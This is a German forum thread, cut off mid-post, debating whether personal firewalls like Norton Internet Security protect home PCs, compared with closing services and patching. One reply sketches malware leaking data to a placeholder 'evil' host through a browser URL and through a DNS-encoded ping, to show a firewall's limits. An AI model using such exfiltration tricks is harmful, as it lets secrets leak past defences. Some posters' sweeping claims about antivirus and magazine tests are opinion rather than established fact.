Hi, ich habe mal eine Frage. Ich habe 2 Rechner, der eine Direkt ans Internet angeschlossen. Der 2. mit einer Netzwerkkarte mit dem ersten verbunden. Will mit dem ersten Downloaden und der 2. soll zum surfen sein. Hab im moment auf beiden Rechner Norton Internet Security. Brauche ich auf dem 2. Rechner, der nur zum surfen sein soll auch eine Firewall und Auto-Project? Oder regelt das alles der 1.?
Hallo
Hab im moment auf beiden Rechner Norton Internet Security.
Warum?
Brauche ich auf dem 2. Rechner, der nur zum surfen sein soll auch
eine Firewall und Auto-Project? Oder regelt das alles der 1.?
Norton InSecurity brauchst Du IMHO auf gar keinem Rechner, da dieses Stück Software die Sicherheit nicht wirklich verbessern kann. Weiters wird eine Firewall-Lösung prinzipiell am Netzwerk-Perimeter eingerichtet. Also dort, wo das LAN und das ‚böse‘ Internet zusammentreffen. In Deinem Fall also zwischen Deinem 1. Rechner und dem Internet.
Damit Du die für Deine Bedürfnisse passendste Lösung finden kannst, empfiehlt es sich, zunächst möglichst umfangreiches Wissen anzueignen. Als Lektüre für den Anfang würde ich http://www.linkblock.de empfehlen. Und auf http://www.dingens.org gibts ein kostenloses Tool, welches Dir hilft, die Dienste von Deinen Rechnern sinnvoll zu konfigurieren. Allerdings ist es ratsam, die dort verlinkten weiterführenden Informationen ebenfalls zu studieren.
CU
Peter
Hallo Peter,
Norton InSecurity brauchst Du IMHO auf gar keinem Rechner, da
dieses Stück Software die Sicherheit nicht wirklich verbessern
kann.
da bin ich ganz anderer Meinung. Durch die automatische Port-Blockierung ist ein erheblicher Sicherheitszuwachs gegeben. Trojaner und Backdoors haben da keine Chance mehr. Aber auch andere Viren, die man sich schon durch die pure Verbindung zum Internet ohne Firewall zuziehen kann, haben es damit sehr schwer. Wir hatten da vor etwa einem Jahr einen Fall, in dem sehr viele Rechner befallen waren. Der automatische Scan aller Downloaddateien bietet weitere Sicherheit (bei aktueller Virendatenbank). Auch Kazaa-Downloads und sonst alles, was irgendwie aus dem Internet an Daten auf den Rechner kommt, wird auf Viren und maligne Scripte gecheckt. Der E-Mail-Scan kann ebenfalls maligne Scripte erkennen u.s.w. Sehr schön ist auch die Popup-Block-Funktion. Für den Ottonormalsurfer ist eine Firewall wie die Norton Personal Firewall bzw. Norton Internet Security IMHO mit Sicherheit ein sehr gutes, leicht einstellbares und effektives Sicherheits-Tool. Unabhängige Tests beweisen, dass diese Software von Symantec ganz oben mitmischen kann. Was glaubst du, vor wievielen Viren das „Stück Software“ mich bereits bewahrt hat (wenn ich dem Logbuch glauben soll)? Ich finde, ein Antiviren-Programm zu installieren ist immer besser als keines zu installieren. Die eigene Vorsicht trägt natürlich auch ihres dazu bei.
Gruß
Heiliger Bimbam
Hallo,
[…]
Durch die automatische
Port-Blockierung ist ein erheblicher Sicherheitszuwachs
gegeben.
Nein.
Trojaner und Backdoors haben da keine Chance mehr.
Interessant. Im Zweifel schalten die Norton einfach ab. Vielleicht solltst Du dafür sorgen, daß sie ersta garnicht auf den Rechner kommen?
Aber auch andere Viren, die man sich schon durch die pure
Verbindung zum Internet ohne Firewall zuziehen kann, haben es
damit sehr schwer.
Vielleicht solltest Du Dein Windows einfach mal aktuell halten?
Wir hatten da vor etwa einem Jahr einen
Fall, in dem sehr viele Rechner befallen waren.
Ihr solltet Eure Administratoren schulen. Offenbar besteht da Bedarf. Oder wie konkret wer es zu einer Infektion gekommen?
Der
automatische Scan aller Downloaddateien bietet weitere
Sicherheit (bei aktueller Virendatenbank). Auch
Kazaa-Downloads und sonst alles, was irgendwie aus dem
Internet an Daten auf den Rechner kommt, wird auf Viren und
maligne Scripte gecheckt.
Aha. Und sonst führst Du alles aus, was „so aus dem Internet“ kommt? Mutig.
Der E-Mail-Scan kann ebenfalls
maligne Scripte erkennen u.s.w. Sehr schön ist auch die
Popup-Block-Funktion.
Das hat doch ein moderner Browser eingebaut. Oder habe ich etwas verpasst?
Für den Ottonormalsurfer ist eine
Firewall wie die Norton Personal Firewall bzw. Norton Internet
Security IMHO mit Sicherheit ein sehr gutes, leicht
einstellbares und effektives Sicherheits-Tool.
Nein. Du solltest die FAQ des IT-Sicherheitsbrettes lesen.
Unabhängige
Tests beweisen, dass diese Software von Symantec ganz oben
mitmischen kann.
Den „Unabhängigen Test“ möchte ich bitte lesen. brigens: Tote Fische mischen auch „ganz oben“ mit.
Was glaubst du, vor wievielen Viren das
„Stück Software“ mich bereits bewahrt hat (wenn ich dem
Logbuch glauben soll)?
Das Logbuch ist bei derartigen Programmen in erster Linie ein Marketing-Instrument, in dem triviale und irrelevante Ereignisse als Situation deklariert werden, die durch Norton entschärft wurden. Das ist hochgradig unseriös.
Ich finde, ein Antiviren-Programm zu
installieren ist immer besser als keines zu
installieren.
Das finde ich nicht. Schon garnicht nicht in der Pauschalität.
Die eigene Vorsicht trägt natürlich auch ihres
dazu bei.
Nein, die ist - neben sicherer Konfiguration des Rechners und aktueller Software - der wichtigste Punkt.
Gruß,
Sebastian
edit Mod (Heiner): Ich habe mal die Spitze gegen das andere Mitglied durch […] ersetzt.
1 „Gefällt mir“
[…]
Nun mal Spass beiseite: wenn ein Programm (wie immer es heißen mag) diesen oder jenen Virus gefunden hat, dann IST es in jedem Fall besser, als den Virus auf dem Rechner zu haben, sei es ein bewusster Download oder der Anhang einer Mail. Basta. Tja natürlich weiß ich, dass ich nicht alles ausführen soll, was da so reintrudelt, aber manchmal lädt man sich ein vermeintlich sauberes Tool herunter und schon ist’s passiert. Mir ist sehr wohl klar, dass die Aktualität der Software wichtig ist, aber du glaubst doch nicht im Ernst, dass irgendwo in einem Rechnerverbund mit hunderten von Rechnern sofort nach dem Erscheinen auf jedem einzelnen das Patch installiert wird. Die Admins wären doch dann nur noch mit der Installation der Patches beschäftigt.
[…]
Nein.
Doch!
Vielleicht solltst Du dafür sorgen, daß sie ersta garnicht auf
den Rechner kommen?
Wie gesagt, mancher Surfer macht sich da nicht so viele Gedanken oder er hat keine Lust, sich Gedanen zu machen. Dem hilft die Software. Was ist denn dabei? Es sind doch meine Ressourcen, die sie verbraucht!
Vielleicht solltest Du Dein Windows einfach mal aktuell
halten?
Ist bereits ausreichend erörtert.
Ihr solltet Eure Administratoren schulen. Offenbar besteht da
Bedarf. Oder wie konkret wer es zu einer Infektion gekommen?
Ich bin kein Administrator und kann nicht beurteilen, wie es dazu kam und ob der Virus nicht etwa mit einer Fremd-CD-ROM eingeschleppt wurde.
Aha. Und sonst führst Du alles aus, was „so aus dem Internet“
kommt? Mutig.
Nein, nicht mutig, sondern bedacht - mit minimalem Restrisiko nachdem die bei mir stets brandaktuelle Firewall das gecheckt hat.
Nein. Du solltest die FAQ des IT-Sicherheitsbrettes lesen.
Okay, die Sicherheit ist niemals komplett, aber die Firewall verhindert wenigstens einen Teil der Angriffsversuche und somit ist die Sicherheit bereits gestiegen, wenn auch - wie du betonst - nicht komplett. Nicht jeder hat Lust und Zeit, sich die Grundlagen der IT-Sicherheit reinzutun. Mancher will einfach nur surfen und sich nicht durch unübersichtliche FAQ quälen.
Den „Unabhängigen Test“ möchte ich bitte lesen. brigens: Tote
Fische mischen auch „ganz oben“ mit.
Ich habe bereits Tests von Firewalls in der „Computer-Bild“ und in einer anderen Zeitschrift (weiß nicht mehr welche) gelesen und da war einmal die NPF an Platz 1 und ein anderes Mal an Platz 2. Das spricht IMHO für sich. Und die Fachleute, die das gemacht haben, die kennen sich bestimmt damit aus. Aber ich weiß, dein Geist ist in jedem Fall genialer und du kennst dich damit noch viel besser aus. Das wollen wir hier nicht verschweigen.
Das Logbuch ist bei derartigen Programmen in erster Linie ein
Marketing-Instrument, in dem triviale und irrelevante
Ereignisse als Situation deklariert werden, die durch Norton
entschärft wurden. Das ist hochgradig unseriös.
Ist es nicht. Virus gefunden und Datei repariert oder gelöscht ist NICHT irrelevant.
Ich finde, ein Antiviren-Programm zu
installieren ist immer besser als keines zu
installieren.Das finde ich nicht. Schon garnicht nicht in der Pauschalität.
Das finde ich aber doch.
Nein, die ist - neben sicherer Konfiguration des Rechners und
aktueller Software - der wichtigste Punkt.
Jo, auch die Personal Firewall muss aktuell sein. Aber das erledigt LiveUpdate ganz von alleine.
Gruß
Heiliger Bimbam
edit Mod (Heiner): Auch hier habe ich eine Spitze gegen ein anderes Mitglied durch […] ersetzt.
[…]
Nun mal Spass beiseite: wenn ein Programm (wie immer es heißen
mag) diesen oder jenen Virus gefunden hat, dann IST es in
jedem Fall besser, als den Virus auf dem Rechner zu haben, sei
es ein bewusster Download oder der Anhang einer Mail. Basta.
Personal firewall (aka. Paketfilter)? Viren? Verwechseln wir da gerade was?
Und wenn es fuenf anderen Haus und Hof oeffnet? Das solche Programme sich eher stoerend auf die Kommunikation im Netz auswirken ist auch schon oefter aufgetreten.
Tja natürlich weiß ich, dass ich nicht alles ausführen soll,
was da so reintrudelt, aber manchmal lädt man sich ein
vermeintlich sauberes Tool herunter und schon ist’s passiert.
Wenn Du software aus nicht vertrauenswuerdigen Quellen ausfuehrst hilft Dir der Norten-Krempel auch nicht.
Mir ist sehr wohl klar, dass die Aktualität der Software
wichtig ist, aber du glaubst doch nicht im Ernst, dass
irgendwo in einem Rechnerverbund mit hunderten von Rechnern
sofort nach dem Erscheinen auf jedem einzelnen das Patch
installiert wird. Die Admins wären doch dann nur noch mit der
Installation der Patches beschäftigt.
Dann sind die Admins offensichtlich unterqualifiziert und sollten sich dementsprechend fortbilden oder einen anderen Job suchen. Das von Dir beschriebene Konzept ist im Aufwand linear mit der Anzahl der hosts: es wird niemals skalieren und ist damit nicht brauchbar.
Hier kuerze ich mal etwas ab:
Nein.
Doch!
Niemals.
Wohl!!1
Gar nicht.
Sicher.
Falsch, falsch, falsch und dreimal falsch. Naehnaeh, naenaehnaeh… Koennen wir solche ‚Nein-Doch-Wohl-Diskussionen‘ lassen? Danke.
Wie gesagt, mancher Surfer macht sich da nicht so viele
Gedanken oder er hat keine Lust, sich Gedanen zu machen. Dem
hilft die Software.
Nein. Schadsoftware schaltet diese software einfach aus oder umgeht sie.
Was ist denn dabei?
Dass Du Dich in eine falsche Sicherheit wiegst, durch Dein unvorsichtiges Verhalten Dein Rechner mit Schadsoftware verseucht wird. Und dann…
Es sind doch meine Ressourcen, die sie verbraucht!
… sind es auch meine resourcen, die Du verbrauchst. Ich kenne Menschen, die haben in ihrer mailbox ein Verhaeltnis von 1:20 zwischen echten mails und viren (+spam). Der ueberwiegende Teil duerfte von verseuchten Rechnern kommen.
Ihr solltet Eure Administratoren schulen. Offenbar besteht da
Bedarf. Oder wie konkret wer es zu einer Infektion gekommen?Ich bin kein Administrator und kann nicht beurteilen, wie es
dazu kam und ob der Virus nicht etwa mit einer Fremd-CD-ROM
eingeschleppt wurde.
Dann muss ich Sebastian zustimmen: eure Administratoren sollten geschult werden.
Aha. Und sonst führst Du alles aus, was „so aus dem Internet“
kommt? Mutig.Nein, nicht mutig, sondern bedacht - mit minimalem Restrisiko
nachdem die bei mir stets brandaktuelle Firewall das gecheckt
hat.
Du hast keine firewall. Deine personal firewall kann das nicht verhindern. Konkret: wie verhindert pfw, dass $malware system("iexplorer.exe http://evil.host.ivalid/badscript.php?info=this_is_y…) aufruft? Wie verhindert pfw, dass $malware system(„ping this.is.your.secret.information.evil.host.invalid“) aufruft?
Nein. Du solltest die FAQ des IT-Sicherheitsbrettes lesen.
Okay, die Sicherheit ist niemals komplett, aber die Firewall
verhindert wenigstens einen Teil der Angriffsversuche und
somit ist die Sicherheit bereits gestiegen, wenn auch - wie du
betonst - nicht komplett.
Du begnuegst Dich mit einer Sicherheitsloesung, die manchmal vielleicht, wenn auch bekanntermassen schlecht funktioniert? Du mutest dem Nutzer all die Probleme zu, mit denen Du oben bei Deinem Eudora-Problem zu kaempfen hast?
Nicht jeder hat Lust und Zeit, sich die Grundlagen der
IT-Sicherheit reinzutun.
Ich wollte auch nicht zur Fahrschule gehen und mir diesen ganzen Grundlagen-Mist mit Verkehrszeichen und weissen Streifen auf der Strasse antun…
Mancher will einfach nur surfen
… ich wollte einfach nur autofahren.
und sich nicht durch unübersichtliche FAQ quälen.
Hast Du Dir diese unuebersichtlichen FAQs mal angesehen?
Den „Unabhängigen Test“ möchte ich bitte lesen.
Ich auch.
Ich habe bereits Tests von Firewalls in der „Computer-Bild“
und in einer anderen Zeitschrift (weiß nicht mehr welche)
gelesen und da war einmal die NPF an Platz 1 und ein anderes
Mal an Platz 2. Das spricht IMHO für sich.
Die halbseitige Anzeige, die Symantec zwei Seiten weiter geschalten hat auch… Bitte jetzt mit dem Denken anfangen. Glaubst Du, diese Werbung gaebe es noch dort, wenn $Zeitschrift das beworbene Produkt wirklich kritisch testet und regelmaessig auf Sicherheitsprobleme hinweist?
Und die Fachleute,
Namen?
die das gemacht haben, die kennen sich bestimmt damit aus.
Bestimmt. Peter Huth ist auch bestimmt ein Sicherheitsexperte. Mich wuerde mal ganz einfach interessieren, welche Aspekte der software getestet wurden.
Ist es nicht. Virus gefunden und Datei repariert oder gelöscht
ist NICHT irrelevant.
Du mengst hier munter zwischen personal firewalls und Virenscannern hin und her. Vielleicht moechtest Du Dich mal entscheiden, worueber wir reden. (Gleich vorab: zu Virenscannern sage ich nichts, halte sie persoenlich aber auch fuer ueberfluessig.)
Das finde ich nicht. Schon garnicht nicht in der Pauschalität.
Das finde ich aber doch.
Nein. Doch. Niemals. Klar, bestimmt. Gar nicht war… blabla, blabla.
Jo, auch die Personal Firewall muss aktuell sein. Aber das
erledigt LiveUpdate ganz von alleine.
Zwei Dinge updaten? Wenn eins reicht?
Gruss vom Frank.
edit Mod (Heiner): Ich musste nur ein Zitat abwandeln (mit […] ersetzt), da der betreffende Teil im Vorgängerartikel auch gelöscht wurde.
1 „Gefällt mir“
Hallo Heiliger Bimbam
Norton InSecurity brauchst Du IMHO auf gar keinem Rechner, da
dieses Stück Software die Sicherheit nicht wirklich verbessern
kann.da bin ich ganz anderer Meinung.
So? Schön, schauen wir mal.
Durch die automatische Port-Blockierung ist ein erheblicher
Sicherheitszuwachs gegeben.
Du meinst die Port-Blockierung durch Norton InSecurity? Sorry, da liegst Du falsch. Sinnvoller ist es, den Rechner (ja, das muss man mit jedem einzelnen Rechner des betreffenden Netzwerks machen…) so zu konfigurieren, dass keine Dienste laufen und somit gar keine Ports geöffnet sind. Oder nur die Dienste laufen und im LAN erreichbar sind, von denen man das explizit wünscht.
Eine Personal Firewall vor einen offenen Port zu schalten ist wie einen Vorhang an einen Durchgang zu hängen. Den Dienst zu beenden und den Port dadurch zu schliessen, ist dagegen wie ein Zumauern des Durchgangs.
Trojaner und Backdoors haben da keine Chance mehr.
Trojaner, Backdoors, Viren etc. können, wenn sie einmal auf dem Rechner sind, allfällige Placebo-Software wie Norton InSecurity umgehen oder gleich ganz abschiessen. Der Selbstschutz von solcher Software ist leider in den meisten Fällen schlicht nicht vorhanden.
Aber auch andere Viren, die man sich schon durch die pure
Verbindung zum Internet ohne Firewall zuziehen kann, haben es
damit sehr schwer.
Da kenne ich im Moment zwei Stück, Sasser und Blaster. Beide nutzen eine Sicherheitslücke in einem Dienst von Windows (einmal LSASS, einmal RPC) aus. Bei einem korrekt gewarteten System sind die Patches, die a) vor den Würmern verfügbar waren und b) die jeweiligen Sicherheitslücken schliessen, längst eingespielt.
In so einem Fall kann eine Personal Firewall allenfalls temporär helfen, wenn man sich diese Patches aus dem Internet holen muss.
Der automatische Scan aller Downloaddateien bietet weitere
Sicherheit (bei aktueller Virendatenbank).
Wenn ein Antivirentool beim Scan einer Datei etwas findet, muss die betreffende Datei nicht in jedem Fall infiziert sein. Und wenn es nichts findet, heisst das noch lange nicht, dass die Datei wirklich sauber ist. Aber bitte, wer will kann sich gern ein Antivirentool einrichten.
Der E-Mail-Scan kann ebenfalls maligne Scripte erkennen u.s.w.
Einen expliziten Email-Scan braucht man nicht. Man konfiguriert sein Mailprogramm so, dass es nichts ohne Zutun des Benutzers ausführt. Und am besten auch so, dass es alle Mails als Plaintext angezeigt werden. Wenn man dann alle Mailattachments nach den selben Grundsätzen behandelt (Mailattachments gelten grundsätzlich erstmal als gefährlich. So lange, bis man eigenhändig geprüft hat, ob sie gefährlich sind oder nicht) und sich einigermassen über die jeweils kursierenden Würmer etc. informiert, erkennt man das ganze Wurm-Zeugs vom Schiff aus.
Sehr schön ist auch diePopup-Block-Funktion.
Das brauche ich nicht, das hat Mozilla Firefox schon eingebaut. Den IE sollte man ohnehin nicht verwenden, da der inhärent unsicher ist.
Für den Ottonormalsurfer ist eine
Firewall wie die Norton Personal Firewall bzw. Norton Internet
Security IMHO mit Sicherheit ein sehr gutes, leicht
einstellbares und effektives Sicherheits-Tool.
Das ist ein grosser Irrglaube. Damit eine Personal Firewall einigermassen sinnvoll eingesetzt werden kann, muss sie möglichst detailliert konfiguriert werden. Dazu ist aber, allen bunten Oberflächen dieser Tools zum Trotz, Wissen zwingend notwendig. Und genau dieses Wissen hat der Ottonormalsurfer nicht. Es artet daher zu russischem Roulette aus, wenn sich so jemand so eine Software installiert.
Unabhängige Tests beweisen, dass diese Software von Symantec ganz
oben mitmischen kann.
Quellen? Und bitte keine Tests von Zeitschriften wie CHIP, PC-Welt o.ä., denn die sind a) nicht unabhängig und b) meist nicht das Papier wert, auf denen sie gedruckt sind.
Andererseits: Hast Du Dir mal http://www.linkblock.de durchgelesen? Wenn nein, solltest Du das mal tun.
Was glaubst du, vor wievielen Viren das
„Stück Software“ mich bereits bewahrt hat (wenn ich dem
Logbuch glauben soll)?
Was glaubst Du, wie viele Viren hat das Ding gar nicht erst erkannt?
Ich finde, ein Antiviren-Programm zu
installieren ist immer besser als keines zu
installieren. Die eigene Vorsicht trägt natürlich auch ihres
dazu bei.
Ein Antivirentool kann man gern verwenden. Es ging hier aber um Personal Firewalls. Die sind noch weniger nützlich als Antivirentools.
BTW: Ich selber habe auf meinen privaten PCs zu Hause keine Antivirensoftware. Von PFW gar nicht erst zu reden. Und dennoch laufen meine Rechner sauber und korrekt, ganz ohne Viren…
CU
Peter
Hallo,
alle Jahre wieder versucht eine solch verunglückte Seele wie Du es bist diesen hier anwesenden, im dunklen Keller ausharrenden Geeks und Nerds die praktische Welt der DAUS näher zu bringen *mitleidiglächel*
Spar dir die kräfte. ist wie gegen Windmühlen kämpfen 
Nun mal Spass beiseite: wenn ein Programm (wie immer es heißen
mag) diesen oder jenen Virus gefunden hat, dann IST es in
jedem Fall besser, als den Virus auf dem Rechner zu haben, sei
es ein bewusster Download oder der Anhang einer Mail. Basta.
Nicht ganz basta
Einen Virus entfernt man mit einem Antivirenprogramm. Diese Norton Security Suite ist aber ein Paket aus vielen versciedenen Dingensens und der grosse Teil darin ist dieses dubiose (ich nenns einfach mal so) Firewall Geschicte und der kleinere Teil ist eben die Antivirengeschichte.
Wenn Du NUR Antivirus instalierst geb ich Dir recht. Der Rest aus dem sonnengelben Paketchen würde ich allerdings nicht installieren
Den „Unabhängigen Test“ möchte ich bitte lesen. brigens: Tote
Fische mischen auch „ganz oben“ mit.Ich habe bereits Tests von Firewalls in der „Computer-Bild“
und in einer anderen Zeitschrift (weiß nicht mehr welche)
gelesen und da war einmal die NPF an Platz 1 und ein anderes
Mal an Platz 2. Das spricht IMHO für sich. Und die Fachleute,
die das gemacht haben, die kennen sich bestimmt damit aus.
Bevor das andere tun nehme ich mal vorweg, das das hier einige eher in schallendes Gelächter ausbrechen lässt. Glaubst Du etwa auch alles was in der bildzeitung steht?!
Gruß
h.
Hallo,
in diesem Thread stellt sich die Frage, was eine Personal-Firewall auf einem Rechner in einem Privatnetzwerk an Sicherheitsgewinn bringt. Und die einzige Antwort ist: Sie schützt derzeit vor genau eine Art von Virus, besser gesagt Wurm, nämlich die Sorte, die sich über den RPC-Bug in Windows verbreitet. Ansonsten ist die Schutzwirkung auf einem sauber konfigurierten PC gleich null. Hat man dann auch noch den Patch installiert, kann die PF komplett abgeschaltet werden.
Viel wichtiger ist ein aktueller Virenscanner, der einen vor den eigentlichn Gefahren bewahrt. Und hat man tatsächlich mal einen Virus auf dem Rechner, den man z.B. beim scannen der Festplatte findet, dann hat das Sicherheitssystem bereits versagt und eine Neuinstallation wäre anzuraten.
Ich bezweifle also, ob sich das Geld für eine PF lohnt. Bei einem Virenscanner steht das außer Frage.
Unabhängige
Tests beweisen, dass diese Software von Symantec ganz oben
mitmischen kann.
Quellen?
Was glaubst du, vor wievielen Viren das
„Stück Software“ mich bereits bewahrt hat (wenn ich dem
Logbuch glauben soll)?
Problem! Du sollst zwar dem Logbuch glauben, darfst es aber nicht. Wahrscheinlich hat dich die PF vor 3.000.000 Pings bewahrt. Ob das ein Erfolg ist?
Ciao
Kaj
Hallo HB
Nun mal Spass beiseite: wenn ein Programm (wie immer es heißen
mag) diesen oder jenen Virus gefunden hat,
Bitte anders formulieren: ‚wenn ein Programm diesen oder jenden Virus gefunden zu haben meint‘ trifft die Sache eher.
Wenn man eine Datei hat, die ein Virus enthalten kann oder auch nicht, mit einem Antivirentool prüft, so können zwei Dinge passieren:
Das Antivirentool findet nichts. Das kann daran liegen, dass die Datei tatsächlich ‚sauber‘ ist. Es kann aber auch daran liegen, dass das Antivirentool die Malware aus irgendeinem Grund nicht erkannt hat.
Das Antivirentool findet etwas (oder meint es zumindest). Da kann es tatsächlich sein, dass der gemeldete Plagegeist in der Datei enthalten ist. Es kann aber auch ein Fehlalarm sein (Bytefolge, die zufällig auf eine Virensignatur passt…).
Man weiss daher genaugenommen nach dem Scan genau gleichviel wie vor dem Scan: Die Datei könnte ein Virus o.ä. enthalten, oder auch nicht. Einen wirklichen Vorteil bringt das Antivirentool daher eigentlich nicht.
…dann IST es in
jedem Fall besser, als den Virus auf dem Rechner zu haben, sei
es ein bewusster Download oder der Anhang einer Mail. Basta.
Irgendwie verstehe ich diesen Satz nicht wirklich. Da fehlt wohl etwas.
Tja natürlich weiß ich, dass ich nicht alles ausführen soll,
was da so reintrudelt, aber manchmal lädt man sich ein
vermeintlich sauberes Tool herunter und schon ist’s passiert.
Da hilft Dir ein Antivirentool aber auch nicht wirklich. Oder nur zufällig. Darauf verlassen sollte man sich jedenfalls nicht.
Mir ist sehr wohl klar, dass die Aktualität der Software
wichtig ist, aber du glaubst doch nicht im Ernst, dass
irgendwo in einem Rechnerverbund mit hunderten von Rechnern
sofort nach dem Erscheinen auf jedem einzelnen das Patch
installiert wird. Die Admins wären doch dann nur noch mit der
Installation der Patches beschäftigt.
In einem Rechnerverbund mit hunderten von Rechnern ist das auch nicht unbedingt zwingend nötig. Ein solches LAN, welches sich in einer Firma, einer Universität o.ä. befindet, dürfte über entsprechende Infrastruktur wie Firewall (nein, keine Personal Firewall, sondern eine Lösung, die diesen Namen auch verdient…), DMZ und ähnliches verfügen. Da ist es für Blaster oder Sasser sehr viel schwerer, sich zu verbreiten. Die grösste Gefahr sind da Rechner (Notebooks), die von extern in das LAN gelangen. In solch einem Netzwerk müssen die Administratoren daher entsprechende Lösungen einsetzen.
Im übrigen dürfte solch ein Netzwerk über irgendeine Lösung verfügen, mit der Software im Netzwerk verteilt werden kann, so dass die flächendeckende Verteilung des jeweiligen Patch, so er denn ausgetestet ist, kein wirkliches Problem darstellt.
Vielleicht solltst Du dafür sorgen, daß sie ersta garnicht auf
den Rechner kommen?Wie gesagt, mancher Surfer macht sich da nicht so viele
Gedanken oder er hat keine Lust, sich Gedanen zu machen.
Wer sich da keine Gedanken machen will oder kann, sollte sich an jemanden wenden, der das für ihn tutn.
Ich will mir auch keine Gedanken darüber machen, wie der Motor oder die Bremsen meines Autos im Detail funktionieren. Daher wende ich mich für Service, Reparaturen etc. an eine Werkstatt mit entsprechend ausgebildetem Personal. Ja, das kostet jeweils Geld. Aber ich bin ziemlich sicher, dass die notwendigen Arbeiten fachgerecht ausgeführt werden.
Dem hilft die Software.
Nein, das tut sie nicht. Ein Antivirentool mag ja noch angehen. Aber eine Software wie eine Personal Firewall hilft nicht ‚einfach so‘ durch Installation. Das ist ein ganz grosser Irrglaube.
Damit eine PFW etwas nützen kann, muss sie zwingend konfiguriert werden. Um sie jedoch sinnvoll konfigurieren zu können, ist in jedem Fall Wissen notwendig. Ansonsten wäre das, wie wenn ich an den Bremsen meines Autos manipuliere: Ob die nachher noch funktionieren oder nicht, wäre reine Lotterie. Russisch Roulette.
Aha. Und sonst führst Du alles aus, was „so aus dem Internet“
kommt? Mutig.Nein, nicht mutig, sondern bedacht - mit minimalem Restrisiko
nachdem die bei mir stets brandaktuelle Firewall das gecheckt
hat.
Eine Firewall checkt gar nichts. Was Du meinst, ist allenfalls das Antivirentool.
Nein. Du solltest die FAQ des IT-Sicherheitsbrettes lesen.
Okay, die Sicherheit ist niemals komplett, aber die Firewall
verhindert wenigstens einen Teil der Angriffsversuche
Nein, tut sie nicht. Sie verhindert vielleicht, dass ein ‚Angriffsversuch‘ erfolgreich ist. Dass aber Angriffsversuche stattfinden, daran ändert eine Personal Firewall nichts.
Allerdings neigen die Dinger dazu, irgendwelche harmlosen Sachen wie einen Ping oder einen einfachen Portscan gleich als ‚Angriff‘ zu melden. Das ist schon mal Quatsch.
Andererseits ist es sinnvoller, die Angriffsfläche, die ein Rechner im Internet bietet, zu verringern. Das geht aber nicht mit einer PFW. Im Gegenteil, die vergrössert die Angriffsfläche. Verringern kann ich die Angriffsfläche, indem ich keine Dienste nach aussen anbiete. Ausser vielleicht einzelnen Diensten, von denen ich das explizit will (etwa wenn ich einen eigenen Webserver betreibe).
Das Beenden von Diensten und das damit verbundene Schliessen der jeweiligen Ports führt dazu, dass ein Angreifer machen kann, was er will, an geschlossenen Ports kann er nichts holen. Nada. Weil ein geschlossener Port wie eine massive Mauer mit aufgemalter Tür ist.
Den „Unabhängigen Test“ möchte ich bitte lesen. brigens: Tote
Fische mischen auch „ganz oben“ mit.Ich habe bereits Tests von Firewalls in der „Computer-Bild“
und in einer anderen Zeitschrift (weiß nicht mehr welche)
Ist völlig egal, welche andere Zeitschrift das war. Du hast Dich mit diesem Satz disqualifiziert. Wer einen Test von Personal Firewalls in der Computer-Bild als ‚unabhängig‘ bezeichnet, hat entweder keine Ahnung oder erzählt wissentlich Unsinn.
Der Grossteil der PC-Zeitschriften ist leider alles andere als unabhängig. Und speziell die Tests von Personal Firewalls sind zumindest fragwürdig, oft genug auch schlicht falsch und gefährlich. Da wird ein Produkt als ‚gut‘ bewertet, wenn es eine bunte Oberfläche hat, die ‚einfach zu bedienen‘ ist. Dass dieses Produkt jedoch in Hinsicht auf die Versprechungen des Herstellers oder der Anforderungen generell mehr oder weniger komplett versagt (z.B. Thema Selbstschutz, wenn eine PFW von ‚bösen‘ Programmen überlistet, abgeschossen, ja sogar die Konfiguration verändert werden kann…), finde ich sehr seltsam.
Ich selber habe ein gewisses Know How in Sachen Netzwerke. Kein absolutes Profi-Wissen und beileibe weiss ich nicht alles. Aber sogar mir sträubt sich regelmässig das Gefieder, wenn ich solche Tests lese. Da ist die Gewichtung der einzelnen Testkriterien, die ich seltsam finde. Da ist aber auch oftmals ein Mangel an Transparenz in Bezug auf die Tests. Was genau getestet wurde, wie und womit, das bleibt meist unerwähnt.
Mir kommt das dann vor, wie wenn ein Auto-Magazin ein Auto zum Testsieger kürt, weil die Airbags farblich auf das Interieur abgestimmt sind, bei diesem Auto aber die Airbags öfter ausfallen oder völlig unvermittelt zünden.
gelesen und da war einmal die NPF an Platz 1 und ein anderes
Mal an Platz 2.
Hmmm… da hat wohl Symantec im zweiten Fall zuwenig gespendet…
Das spricht IMHO für sich.
Ja, es spricht für sich. Aber anders, als Du vermutest.
Und die Fachleute, die das gemacht haben, die kennen sich bestimmt
damit aus.
Sorry, aber da muss ich Dir eine Illusion zerstören: In den Redaktionen von PC-Zeitschriften sitzen Journalisten. Die haben oftmals wenig bis gar keine Ahnung von dem, über das sie schreiben. Und kaum eine Zeitschrift macht all diese Tests wirklich selber. Es gibt Firmen, die testen Antivirensoftware. Die liefern dann die Resultate an die PC-Zeitschriften. Was die dann daraus machen, ist deren Sache. Das dürfte ein Grund dafür sein, dass die Tests wie ich oben geschrieben habe, teils wirklich hanebüchenen Unsinn enthalten.
CU
Peter
Mir ist sehr wohl klar, dass die Aktualität der Software
wichtig ist, aber du glaubst doch nicht im Ernst, dass
irgendwo in einem Rechnerverbund mit hunderten von Rechnern
sofort nach dem Erscheinen auf jedem einzelnen das Patch
installiert wird. Die Admins wären doch dann nur noch mit der
Installation der Patches beschäftigt.
Genau, und deshalb patchen sie nur dann sofort, wenn es sich umgehen lässt.
Darüber hinaus gibt es dann diverse Mechanismen, Patches automatisiert auf die
Maschinen zu bringen. Admins schützen ihre Netze mit anderen Mitteln als die
Anwender zu Hause. Ich weiß es zufälligerweise, weil ich beides bin.
Wie gesagt, mancher Surfer macht sich da nicht so viele
Gedanken oder er hat keine Lust, sich Gedanen zu machen.
Genau da liegt das Problem. Niemand hat Lust, sich irgendwelche Gedanken zu
machen und alle anderen baden es aus. Und eine Personal Firewall ist
schlichtweg nix, worüber man sich keine Gedanken machen muss - im gegenteil.
Glaubst du wirklich, dass die Dinger auch nur einen Funken nützen, wenn der
Anwender nicht in der Lage ist (oder überhaupt willens ist), sich damit
auseinanderzusetzen?
Wenn die Leute es nich bedienen können, oder es nicht wollen, oder es nicht
können wollen, dann helfen diese Dinge:
- buy an administrator oder
- buy a Mac.
Beides hilft richtig. Aber solange Geiz in diesem Land geil ist, wird sich am
Problem der Anwender nichts ändern, und sie werden ihre Lage mit Personal
Firewalls noch verschlimmbessern.
Was Virenscanner angeht stehe ich auf der anderen Seite der Expertenmeinungen
hier im Forum und empfehle die Dinger sogar (auch wenn ich selber keinen
benutze, aber ich benutze ja auch kein Windows). ZUmindest kann man damit einen
